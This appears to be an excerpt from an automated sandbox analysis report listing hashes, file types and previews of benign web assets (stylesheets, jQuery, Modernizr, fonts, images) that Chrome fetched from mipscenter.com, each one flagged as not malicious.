                                                                                                                                                                                                                                        SHA-512:BEA16497D014481EE10EB80A129846B7B184AB1ECA242FA38B84255C6461C748A62F1BD6C15D1807F8B5E926E550C30AB47F8A40AE43BE229E6AB857C4EA6F6F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<!DOCTYPE html>.<html lang=en>. <meta charset=utf-8>. <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">. <title>Error 405 (Method Not Allowed)!!1</title>. <style>. *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:u
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (5536)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):5583
                                                                                                                                                                                                                                        Entropy (8bit):4.972702967410513
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:DEC13618E911E593DF6F60F3FFB1A1D4
                                                                                                                                                                                                                                        SHA1:E59459B9FF660252AC545DAAA6012263316FC156
                                                                                                                                                                                                                                        SHA-256:CFD0027168E9B5A216212EBBF5FE471C81038773BF5DEF3C71366A954693E8E5
                                                                                                                                                                                                                                        SHA-512:8AF581E0EBB400587D7D9055B95E7BF1C0037AF8048D3B9945174A28B6A16CAD146E931195CF43B34CE840D29F22ABE936C83D74AA7E3F5A076D7435EC012C14
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/cache/autoptimize/css/autoptimize_single_31fd6832d3761047ca9f7a21924839af.css
                                                                                                                                                                                                                                        Preview:/*! Magnific Popup v1.1.0 by Dmitry Semenov */..mfp-bg{top:0;left:0;width:100%;height:100%;z-index:9042;overflow:hidden;position:fixed;background:#0b0b0b;opacity:.8}.mfp-wrap{top:0;left:0;width:100%;height:100%;z-index:9043;position:fixed;outline:none !important;-webkit-backface-visibility:hidden}.mfp-container{text-align:center;position:absolute;width:100%;height:100%;left:0;top:0;padding:0 8px;box-sizing:border-box}.mfp-container:before{content:'';display:inline-block;height:100%;vertical-align:middle}.mfp-align-top .mfp-container:before{display:none}.mfp-content{position:relative;display:inline-block;vertical-align:middle;margin:0 auto;text-align:left;z-index:9045}.mfp-inline-holder .mfp-content,.mfp-ajax-holder .mfp-content{width:100%;cursor:auto}.mfp-ajax-cur{cursor:progress}.mfp-zoom-out-cur,.mfp-zoom-out-cur .mfp-image-holder .mfp-close{cursor:zoom-out}.mfp-zoom{cursor:pointer;cursor:zoom-in}.mfp-auto-cursor .mfp-content{cursor:auto}.mfp-close,.mfp-arrow,.mfp-preloader,.mfp-coun
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (13479)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):13577
                                                                                                                                                                                                                                        Entropy (8bit):5.272065782731947
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:9FFEB32E2D9EFBF8F70CAABDED242267
                                                                                                                                                                                                                                        SHA1:3AD0C10E501AC2A9BFA18F9CD7E700219B378738
                                                                                                                                                                                                                                        SHA-256:5274F11E6FB32AE0CF2DFB9F8043272865C397A7C4223B4CFA7D50EA52FBDE89
                                                                                                                                                                                                                                        SHA-512:8D6BE545508A1C38278B8AD780C3758AE48A25E4E12EEE443375AA56031D9B356F8C90F22D4F251140FA3F65603AF40523165E33CAE2E2D62FC78EC106E3D731
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-includes/js/jquery/jquery-migrate.min.js
                                                                                                                                                                                                                                        Preview:/*! jQuery Migrate v3.4.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */."undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){return t(e,window)}):"object"==typeof module&&module.exports?module.exports=t(require("jquery"),window):t(jQuery,window)}(function(s,n){"use strict";function e(e){return 0<=function(e,t){for(var r=/^(\d+)\.(\d+)\.(\d+)/,n=r.exec(e)||[],o=r.exec(t)||[],a=1;a<=3;a++){if(+o[a]<+n[a])return 1;if(+n[a]<+o[a])return-1}return 0}(s.fn.jquery,e)}s.migrateVersion="3.4.1";var t=Object.create(null);s.migrateDisablePatches=function(){for(var e=0;e<arguments.length;e++)t[arguments[e]]=!0},s.migrateEnablePatches=function(){for(var e=0;e<arguments.length;e++)delete t[arguments[e]]},s.migrateIsPatchEnabled=function(e){return!t[e]},n.console&&n.console.log&&(s&&e("3.0.0")&&!e("5.0.0")||n.console.log("JQMIGRATE: jQuery 3.x-4.x REQUIRED"),s.migrateWarnings
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=4], baseline, precision 8, 1536x675, components 3
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):128741
                                                                                                                                                                                                                                        Entropy (8bit):7.869863690734622
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:B545B976ED87ABEF3E558CEEBA2E6E5C
                                                                                                                                                                                                                                        SHA1:BF325E63D2333BB99A896192A37D5AEEE3F7D7EC
                                                                                                                                                                                                                                        SHA-256:7D7A9DA0AA1E0EED077F86F9ABD9E17C849BA6D15CC9AFCBCB5F78313E7FAAEE
                                                                                                                                                                                                                                        SHA-512:592527085FCD7178DF0315596D568A91004FBB3E583656041737288EDB1E342FE1F5AEBC9C9927BEA9D34EDB492894D29FD513BB3EA67756D52FAE89EA344106
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/uploads/2021/02/Capture-1536x675.jpg
                                                                                                                                                                                                                                        Preview:......JFIF.....`.`......Exif..MM.*.......;.........J.i.........Z....... ...............>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=176, yresolution=184, resolutionunit=2], baseline, precision 8, 1536x922, components 3
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):126254
                                                                                                                                                                                                                                        Entropy (8bit):7.97198862531314
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:1D364B7AE3260A1D7E8683609985E712
                                                                                                                                                                                                                                        SHA1:FC94F05190FF032A4814A6EEF0C2A3A29864CF36
                                                                                                                                                                                                                                        SHA-256:ECA65EAB94D0655A8C9C7C4DB218E1E27D75A2313DF53AE689A26A32FEB32934
                                                                                                                                                                                                                                        SHA-512:36BF2F0E971969C9278B5C76CA893DA6A814538D9E9B6AE8A8D6D21A9D49853B63CE1ADED43CA310223E5EAACB97949C746F8A7AAF8B30FD3F8BD137F494CAAF
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/uploads/2024/01/99-1536x922.jpg
                                                                                                                                                                                                                                        Preview:......JFIF.....`.`......Exif..II*...........................................(.......................i.......V.................0231....................0100........................................=...........`.......`.......ASCII...xr:d:DAFuRHSfvjA:345,j:5769527736742887989,t:24012516.....http://ns.adobe.com/xap/1.0/.<x:xmpmeta xmlns:x='adobe:ns:meta/'>. <rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'>.. <rdf:Description rdf:about=''. xmlns:dc='http://purl.org/dc/elements/1.1/'>. <dc:title>. <rdf:Alt>. <rdf:li xml:lang='x-default'>November Header - 99</rdf:li>. </rdf:Alt>. </dc:title>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:Attrib='http://ns.attribution.com/ads/1.0/'>. <Attrib:Ads>. <rdf:Seq>. <rdf:li rdf:parseType='Resource'>. <Attrib:Created>2024-01-25</Attrib:Created>. <Attrib:ExtId>1cd04690-673e-42fd-8187-e991b0a7dd0c</Attrib:ExtId>.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65317), with CRLF, LF line terminators
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):160715
                                                                                                                                                                                                                                        Entropy (8bit):5.0854537093577346
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:CCA4AFB38A552196DE4512F9D3026E0A
                                                                                                                                                                                                                                        SHA1:35EC8491247A396F8A1FACB534525FC72D8B093E
                                                                                                                                                                                                                                        SHA-256:8381910431C4C02A06DA0C99EFECA75F64969B7344277CBCE9259B8F05A42979
                                                                                                                                                                                                                                        SHA-512:C9ADBD249C9B6822EBD3DB31AB3C033B02D186A1A1363A58FD018790AC3FB0EC37480E22EC92A6F126D6DFFEDB804463F9582D66D54E8FD3C0F573D276A48D7A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/cache/autoptimize/css/autoptimize_single_53f1dc6612cff59f6b2f009dea07397a.css
                                                                                                                                                                                                                                        Preview:/*!.. * Bootstrap v4.5.3 (https://getbootstrap.com/).. * Copyright 2011-2020 The Bootstrap Authors.. * Copyright 2011-2020 Twitter, Inc... * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE).. */.:root{--blue:#007bff;--indigo:#6610f2;--purple:#6f42c1;--pink:#e83e8c;--red:#dc3545;--orange:#fd7e14;--yellow:#ffc107;--green:#28a745;--teal:#20c997;--cyan:#17a2b8;--white:#fff;--gray:#6c757d;--gray-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#ffc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sans-serif:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,"Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--font-family-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace}*,*:before,*:after{box-siz
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                                                        Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                        SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                        SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                        SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4875)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):4979
                                                                                                                                                                                                                                        Entropy (8bit):5.295235532062904
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:FABF8E009E52EDAA7A906809CD3F53CE
                                                                                                                                                                                                                                        SHA1:843F8B2470766927B114CD5A01B0B50736881BC8
                                                                                                                                                                                                                                        SHA-256:6DC525A4E867C5FCB24C356A262C4E0C3A15FFE046399E49E5843243C1619251
                                                                                                                                                                                                                                        SHA-512:6D41A631C307DA5A524A62ADEA536B2F4C9394D0B4EBA4799323CA038F639F3C07A6A75A9255508F27C19FC74106CC25B519540F1C05A57FDEF14940A9774D2C
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_fabf8e009e52edaa7a906809cd3f53ce.js
                                                                                                                                                                                                                                        Preview:/*! modernizr 3.6.0 (Custom Build) | MIT *. * https://modernizr.com/download/?-objectfit-setclasses !*/.!function(e,n,t){function r(e){var n=_.className,t=Modernizr._config.classPrefix||"";if(w&&(n=n.baseVal),Modernizr._config.enableJSClass){var r=new RegExp("(^|\\s)"+t+"no-js(\\s|$)");n=n.replace(r,"$1"+t+"js$2")}Modernizr._config.enableClasses&&(n+=" "+t+e.join(" "+t),w?_.className.baseVal=n:_.className=n)}function o(e,n){return typeof e===n}function i(){var e,n,t,r,i,s,a;for(var l in C)if(C.hasOwnProperty(l)){if(e=[],n=C[l],n.name&&(e.push(n.name.toLowerCase()),n.options&&n.options.aliases&&n.options.aliases.length))for(t=0;t<n.options.aliases.length;t++)e.push(n.options.aliases[t].toLowerCase());for(r=o(n.fn,"function")?n.fn():n.fn,i=0;i<e.length;i++)s=e[i],a=s.split("."),1===a.length?Modernizr[a[0]]=r:(!Modernizr[a[0]]||Modernizr[a[0]]instanceof Boolean||(Modernizr[a[0]]=new Boolean(Modernizr[a[0]])),Modernizr[a[0]][a[1]]=r),h.push((r?"":"no-")+a.join("-"))}}function s(e){return e
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):32
                                                                                                                                                                                                                                        Entropy (8bit):3.5931390622295662
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:7867213E624C00E30F2110C66AB75B29
                                                                                                                                                                                                                                        SHA1:8DB8D0D2B891F98F0CC9BBA6BC0E70D39C80F275
                                                                                                                                                                                                                                        SHA-256:D18BEBA8A6DB32DD84B24258CF6542ACCA7684B030E529EF2977198993400C4B
                                                                                                                                                                                                                                        SHA-512:B8FAAF14E84CA9D06902EBF39616CD13029F1049F7D5BCA60A5ABF22E42381322A9E79260349BE6834EDE39C800EC1D45C20F1D260EC9C1F40DB7425C037D5E3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://cdn.callrail.com/companies/373196729/b510a7ffe1052e4121c0/12/swap.js
                                                                                                                                                                                                                                        Preview:/* this account is not active */
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 20960, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):20960
                                                                                                                                                                                                                                        Entropy (8bit):7.987793943192711
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:D312D179276A175029C56C50E9BC9D0B
                                                                                                                                                                                                                                        SHA1:AA9285DD6183C696FC39EC31C221581E2D4959C1
                                                                                                                                                                                                                                        SHA-256:7C0597B1B0C771139C958982210F05B275993037F0F3BA20D7A9300A0741DC80
                                                                                                                                                                                                                                        SHA-512:12CCC8CAD5AD138AB17FC96B97340F5CFDDFBE07D29D7F0A1EA7F0B14E4C06D66D9A89A33CA3BB4DA1EBF09D1B5CA1E9176980ADEB83D59B43CA4C00D99D7D7D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/barlow/v12/7cHqv4kjgoGqM7E3_-gs51os.woff2
                                                                                                                                                                                                                                        Preview:wOF2......Q........L..Qz.............................f..P.`..r.. ........(..p.....6.$..4. ..8..M..V.K....T(.u'.Tk._[.F.n....r.pc.v;@........t.X.l.../..]R....J.....^..(d..g....Aca...sI....ny._<#.Q......|0V heI.4....6i...r........T.l........g...%.F...PR6uY....3...$...N...92.<.......v..wz..w..#O..{....}.lt.!I.jb(.>...3owIE.1.8l.B.L0..2......l.".g2<..'....Q......1.$.G.4..J.Rj3j..L.S...k.......Kg.....[.>(..?fM..i.-.._,.4o.)bs.}...!...B.N.P._.....7@...I9=m...2.8=J....v`....~.. ....O...g.b...(.Q.X)..&bLnLn.-.VW......n...Vo.f1.h.J...A..>......u........6.!....E."...s..&..".b....,...G.2.r_.M.....).J.g.^..J...1^.".....n.":,.....a,.k.e9..o.p..d...6kT....~.....Rv.....B!..~vw"lY8.OB}.. B.k..u7G..A.J.....Z........!.]...(..g*!.A.....;.j..h)z..\@..o.U.~7...c..Zr.....X.^|...7...n....`....QC.c....H.......s...4{..&!.@r.G....Z..1>t>s&......E......_j.....;..$WE8j+Q....;...).SB...r..U..jO...SE..VyYz>O...~...^gJ..8F.........w*. M..R,.P..L:a....@.b.LX.|6I.......Y.L
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (407), with no line terminators
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):407
                                                                                                                                                                                                                                        Entropy (8bit):4.813540558248109
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:23443F3486906CC9BC9AFB0133DDC022
                                                                                                                                                                                                                                        SHA1:C9C1E6BFB1B5F2C0DC7BF11964BE3F1C4733E272
                                                                                                                                                                                                                                        SHA-256:2F167AE1780938FA19464993733924D0D078D5F5CE7955A596A55C210CB36CC8
                                                                                                                                                                                                                                        SHA-512:A361B959A538790E9CA30F136483A3A8ABC1A4D4EDFAA96AE94E29535FF67892F79287654827BE43BBF405E3D4592BA0E27EE8E96B12FC856F8EF86AE8657AC4
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_23443f3486906cc9bc9afb0133ddc022.js
                                                                                                                                                                                                                                        Preview:(()=>{const e=document.querySelectorAll(".coblocks-animate");if("IntersectionObserver"in window){const t=new IntersectionObserver((e=>{e.forEach((e=>{e.isIntersecting&&(e.target.classList.add(e.target.dataset.coblocksAnimation),t.unobserve(e.target))}))}),{threshold:[.15]});e.forEach((e=>{t.observe(e)}))}else e.forEach((e=>{e.classList.remove("coblocks-animate"),delete e.dataset.coblocksAnimation}))})();
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 1536 x 624, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):62515
                                                                                                                                                                                                                                        Entropy (8bit):7.536764912544913
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:96AAE23FB96B381DDB0C1521B89503FE
                                                                                                                                                                                                                                        SHA1:54E839624C1920C137CF1D8B8572D83AA30CDCF1
                                                                                                                                                                                                                                        SHA-256:FC7DCDD2D46677F21240E7A2C124C2D9ECCD372ECFA9FB1D1762514C8C0A895F
                                                                                                                                                                                                                                        SHA-512:5525DC799CAE8A303B1E9A0ED9BD4F47B9E0EF957E2CC9B416A3446A32E8A524EF259AD05B4C18D20CCADE23D0269043ACA4E68DC10D12A7318A79F5C0A276F5
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.......p.....x]Z....1PLTE..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................*7....IDATx....Iv...-...3;.c$. .......2.g#....;Kyb;..#n..$.}8....]..~u..q...!..L.A....^...\....f...6...%.H}AwH.z...7..{?..O~.....}.?`.$..~..\.3.Mu/.}..s}.....C..\..L'.NOO..F...&..y.)S.K|..S.~..$.?..Q&.....m..m..G[.t:.k.S.xT.{4b....t>.a.r.OI..$L........HA...3......I._....r=..,.E&v...F3...%..^_..g... }I....u...+a......$..A6....{.'.8.....&.......!.J+........'>\z....8.&=....I.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 15344, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):15344
                                                                                                                                                                                                                                        Entropy (8bit):7.984625225844861
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:5D4AEB4E5F5EF754E307D7FFAEF688BD
                                                                                                                                                                                                                                        SHA1:06DB651CDF354C64A7383EA9C77024EF4FB4CEF8
                                                                                                                                                                                                                                        SHA-256:3E253B66056519AA065B00A453BAC37AC5ED8F3E6FE7B542E93A9DCDCC11D0BC
                                                                                                                                                                                                                                        SHA-512:7EB7C301DF79D35A6A521FAE9D3DCCC0A695D3480B4D34C7D262DD0C67ABEC8437ED40E2920625E98AAEAFBA1D908DEC69C3B07494EC7C29307DE49E91C2EF48
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxK.woff2
                                                                                                                                                                                                                                        Preview:wOF2......;........H..;..........................d..@..J.`..L.T..<.....x.....^...x.6.$..6. ..t. ..I.h|.l....A....b6........(......@e.]...*:..-.0..r.)..hS..h...N.).D.........b.].......^..t?.m{...."84...9......c...?..r3o....}...S]....zbO.../z..{.....~cc....I...#.G.D....#*e.A..b...b`a5P.4........M....v4..fI#X.z,.,...=avy..F.a.\9.P|.[....r.Q@M.I.._.9..V..Q..]......[ {u..L@...]..K......]C....l$.Z.Z...Zs.4........ x.........F.?.7N..].|.wb\....Z{1L#..t....0.dM...$JV...{..oX...i....6.v.~......)|.TtAP&).KQ.]y........'...:.d..+..d..."C.h..p.2.M..e,.*UP..@.q..7..D.@...,......B.n. r&.......F!.....\...;R.?-.i...,7..cb../I...Eg...!X.)5.Aj7...Ok..l7.j.A@B`".}.w.m..R.9..T.X.X.d....S..`XI..1... .$C.H.,.\. ..A(.AZ.................`Wr.0]y..-..K.1.............1.tBs..n.0...9.F[b.3x...*$....T..PM.Z-.N.rS?I.<8eR'.3..27..?;..OLf*.Rj.@.o.W...........j~ATA....vX.N:.3dM.r.)Q.B...4i.f..K.l..s....e.U.2...k..a.GO.}..../.'..%$..ed.*.'..qP....M..j....../.z&.=...q<....-..?.A.%..K..
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):18
                                                                                                                                                                                                                                        Entropy (8bit):3.5724312513221195
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:53AF239EE5D3E261545DEDEDCB6FFD57
                                                                                                                                                                                                                                        SHA1:04CA7E137E1E9FEEAD96A7DF45BB67D5AB3DE190
                                                                                                                                                                                                                                        SHA-256:99EB12F2AB3C4866A353E098FFA3CB7A967E617C49B98480394EC5D8EA92B094
                                                                                                                                                                                                                                        SHA-512:C734E4A5FF5D335A91518DBF47861BDAF8012AF49371DCD2E3350E269C9A5A1CC094114D17C4F5B053F3757B4B07487EBD0D309C91EF97ACF4665CC5D5C9A2D3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:404 page not found
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (10502), with no line terminators
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):10502
                                                                                                                                                                                                                                        Entropy (8bit):5.222995104157287
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:39665EE2DC57BEF3021CF6BABD84A7C6
                                                                                                                                                                                                                                        SHA1:00736D8F687F526211095A9C1D29617D2DFBF012
                                                                                                                                                                                                                                        SHA-256:D1C63396C6FB5D907ED689C0BDA392011D3F177A7B599363C76BD323CD956F22
                                                                                                                                                                                                                                        SHA-512:E2C1ADA84B8442A5F8A7B430F8A164C88FE238A547753DB19F21B02C1A072A2866C511E3F70E84521BCB91CB2C0A3633A1C4DB3271396BB16AA55D83F7B76032
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_39665ee2dc57bef3021cf6babd84a7c6.js
                                                                                                                                                                                                                                        Preview:(()=>{var e={2590:function(e){e.exports=function(){"use strict";function e(){return e=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(e[i]=n[i])}return e},e.apply(this,arguments)}function t(e,t){void 0===t&&(t=[]),Array.isArray(t)||(t=[t]),t.forEach((function(t){return!e.classList.contains(t)&&e.classList.add(t)}))}function n(e,t,n,i){e.addEventListener(t,n,i)}function i(e,t,n){e.removeEventListener(t,n)}function r(e,t,n){return void 0===n&&(n=""),e.setAttribute(t,n),e}function o(e,t,n){return Object.keys(t).forEach((function(n){e.style[n]=t[n]})),n&&getComputedStyle(e),e}var a={direction:"horizontal",touchRatio:1,touchAngle:45,longSwipesRatio:.5,initialSlide:0,loop:!1,freeMode:!1,passiveListeners:!0,resistance:!0,resistanceRatio:.85,speed:300,longSwipesMs:300,spaceBetween:0,slidesPerView:1,centeredSlides:!1,slidePrevClass:"swiper-slide-prev",slideNextClass:"swiper-slide-next",slideActiveClass:
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (552), with no line terminators
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):552
                                                                                                                                                                                                                                        Entropy (8bit):4.766536125960151
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:5F6A2B3D3BBEFE0218AC66256F998558
                                                                                                                                                                                                                                        SHA1:21185453BBE6C22BBB1816DE8EF5AA1D919BBF58
                                                                                                                                                                                                                                        SHA-256:19CAE852BF113944B5163A4261EF9E9268333D687677D35469DED781108F30E1
                                                                                                                                                                                                                                        SHA-512:3FA2B6D3939A16399EBA28EDDC914A250AF3252900E046B746C138B6AB54CE46AE56AEA58F3EE62FBC2646F44AD83EB0FA4F92441703F5637B612948C3109F1B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_fb0c7bc7a6d9f663a06090c047a9fb61.js
                                                                                                                                                                                                                                        Preview:window.onload=function(){var mypractis_popup=document.getElementById("mypractis-popup");if(mypractis_popup){var mypractis_popup_close=document.getElementById("mypractis-popup-close");mypractis_popup.style.display="block";mypractis_popup_close.onclick=function(){mypractis_popup.style.display="none";};window.onclick=function(event){if(event.target==mypractis_popup){mypractis_popup.style.display="none";}};document.addEventListener("keydown",function(event){event=event||window.event;if(event.key=='Escape'){mypractis_popup.style.display="none";}});}};
